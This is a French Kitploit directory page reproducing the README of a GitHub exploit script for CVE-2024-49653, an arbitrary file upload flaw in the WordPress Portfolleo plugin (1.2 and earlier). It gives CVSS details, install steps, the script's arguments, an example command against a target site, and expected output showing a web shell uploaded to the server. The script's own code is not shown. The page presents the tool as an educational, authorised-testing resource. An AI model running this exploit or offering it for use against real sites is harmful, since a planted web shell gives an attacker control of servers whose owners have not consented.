Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-49653 — WordPress Portfolleo plugin <= 1.2 - Vulnérabilité de téléchargement de fichier arbitraire | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-49653
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2024-49653

CVE-2024-49653

WordPress Portfolleo plugin <= 1.2 - Vulnérabilité de téléchargement de fichier arbitraire

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

📜 Exploit du plugin WordPress Portfolleo (CVE-2024-49653)

🚨 Détails de la vulnérabilité

Titre : Plugin WordPress Portfolleo <= 1.2 - Vulnérabilité de téléversement arbitraire de fichier

Description :
La vulnérabilité de téléversement sans restriction de fichier de type dangereux dans le plugin Portfolleo de James Eggers permet de téléverser un web shell sur un serveur web. Ce problème affecte Portfolleo de la version n/a jusqu'à la version 1.2.

En savoir plus :

  • CWE-434 : CWE-434 Téléversement sans restriction de fichier de type dangereux

Score CVSS :

  • Score : 9.9
  • Sévérité : CRITIQUE
  • Version : 3.1
  • Vecteur : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

📋 Guide de l'utilisateur

🚀 Utilisation du script

Ce script exploite la vulnérabilité de téléversement arbitraire de fichier dans le plugin WordPress Portfolleo (versions <= 1.2) pour téléverser un web shell.

📦 Prérequis

Vous devez avoir installé les éléments suivants pour exécuter le script :

  • Python 3
  • La bibliothèque requests
  • La bibliothèque beautifulsoup4

Vous pouvez installer les bibliothèques requises avec :

root@kitploit:~
pip install requests beautifulsoup4

🛠️ Utilisation

Exécutez le script avec les options suivantes :

root@kitploit:~

CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD

Plugin WordPress Portfolleo <= 1.2 - Vulnérabilité de téléversement arbitraire de fichier # par Khaled Alenazi

options:
  -h, --help            Affiche ce message d'aide et quitte
  -u, --url URL         URL de base du site (ex. http://target/wordpress)
  -U, --username USERNAME
                        Nom d'utilisateur WordPress
  -p, --password PASSWORD
                        Mot de passe WordPress

📝 Exemple

root@kitploit:~
 
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123

📊 Sortie attendue

Si le script s'exécute correctement, vous devriez voir la sortie suivante :

root@kitploit:~
[+] Connexion réussie.
[+] _wpnonce extrait : e5f7ffa134
[+] Le shell a été téléversé.
[*] Vérifiez le shell ici : http://target.com/wp-content/portfolleo/nxploit.php

⚠️ Avertissement

Ce script est destiné uniquement à des fins éducatives. L'auteur n'approuve pas l'utilisation de ce script pour des activités illégales. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez l'autorisation explicite de tester.

Par : Nxploited | Khaled Alenazi

Télécharger l’outil